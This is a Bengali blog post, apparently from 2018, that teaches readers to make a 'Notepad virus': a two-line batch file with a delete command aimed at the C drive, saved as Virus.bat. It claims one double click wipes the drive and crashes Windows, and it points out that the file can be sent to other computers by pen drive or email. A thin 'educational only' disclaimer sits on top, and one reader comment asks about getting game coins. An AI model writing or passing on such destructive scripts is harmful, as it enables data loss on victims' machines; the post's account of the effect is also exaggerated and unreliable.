তৈরি করুন নোটপ্যাড ভাইরাসঃ এক ছোবলেই ছবি।


সতর্কীকরণঃ এই আর্টিকেলটি শুধুমাত্র শিক্ষণীয় উদ্দেশ্যে লেখা। কারো কোন ধরনের ক্ষতি করার উদ্দেশ্যে লেখা হয়নি। এই আর্টিকেল বা এর ব্যাবহারে কারো কোন ক্ষতি হলে তা ব্যবহারকারীর দায়িত্ব। BongoBin এই আর্টিকেলের অসাধু ব্যাবহার সমর্থন করে না। এবং কোন দায় ভার ও নেয় না।

আজকের লেখাটির উদ্দেশ্য হল কম্পিউটার সায়েন্সের গভীর ক্ষেত্র অর্থাৎ কোডিং এবং এর শক্তি সম্পর্কে সামান্য ধারণা দেয়া। সামান্য দুই লাইনের এই কোডিং এর মধ্যমে যে ফাইল টি আজ তৈরি করব তা মাত্র একটা ডাবল ক্লিকেই সম্পুর্ন C ড্রাইভ ডিলেট করে উন্ডোজ ক্রাশ করাতে সক্ষম।

আর বকবক না করে চলুন ফাইল টি তৈরি করে ফেলি। ফাইলটি তৈরি করতে আমাদের লাগবে শুধুমাত্র নোটপ্যাড যা উইন্ডোজ কম্পিউটারে স্বাভাবিক ভাবেই থাকে।

প্রথমেই একটা নোটপ্যাড ওপেন করে নিন। নিচের মত একটা উইন্ডো আসবে।



এবার নিচের মত করে দুইটা লাইন লিখুন। অথবা কপি করে পেষ্ট করে দিন।
@echo off
Del C:\ *.* /y 
নিচের মত দেখতে হবে।


এবার ফাইল অপ্সহনে গিয়ে সেভ এজ ক্লিক করুন। এখানে সেইভ এজ টাইপে গিয়ে নিচের মত অল ফাইলস সিলেক্ট করে দিন এবং নাম দিন Virus.bat। ফাইলের নাম যাই দিন না কেন শেষের (.bat) এক্সটেনশন কিন্তু অবশ্যই থাকতে হবে।


এবার সেইভ করুন। যেখানে সেইভ করেছেন সেখানে নিচের মত একটা ব্যাচ ফাইল আসবে।


এটিই আপনার কাঙ্ক্ষিত সেই বিধ্বংসী ভাইরাস। এতে ভূলেও ডাবল ক্লিক করেছেন তো আপনার পিসির C:// ড্রাইভ পুরা ফাঁকা করে দিয়ে উইন্ডো ক্রাশ করাবে।

সতর্কতাঃ এই ফাইল কিন্তু পোর্টেবল। অর্থাৎ পেইন ড্রাইভ বা মেইলে অন্য কোন কম্পিউটারে পাঠালে সেখানেও একই ভাবে কাজ করবে। সাবধানতার সাথে ব্যাবহার করবেন।

আজকে এই পর্যন্তই। সামনের ট্রিক্সে আবার দেখা হবে। পেইজে লাইক দিয়ে নতুন নতুন পোষ্ট দেখুন সবার আগে। আর ট্রিক্সটি ভালো লাগলে শেয়ার করতে ভুলবেন না।
তৈরি করুন নোটপ্যাড ভাইরাসঃ এক ছোবলেই ছবি। তৈরি করুন নোটপ্যাড ভাইরাসঃ এক ছোবলেই ছবি। Reviewed by Asad Bin Abdullah on February 27, 2018 Rating: 5

2 comments:

  1. ভাই আমার একটা 8Ball pool অর আইডিত কয়েন আর কেশ নিতাম

    ReplyDelete

Powered by Blogger.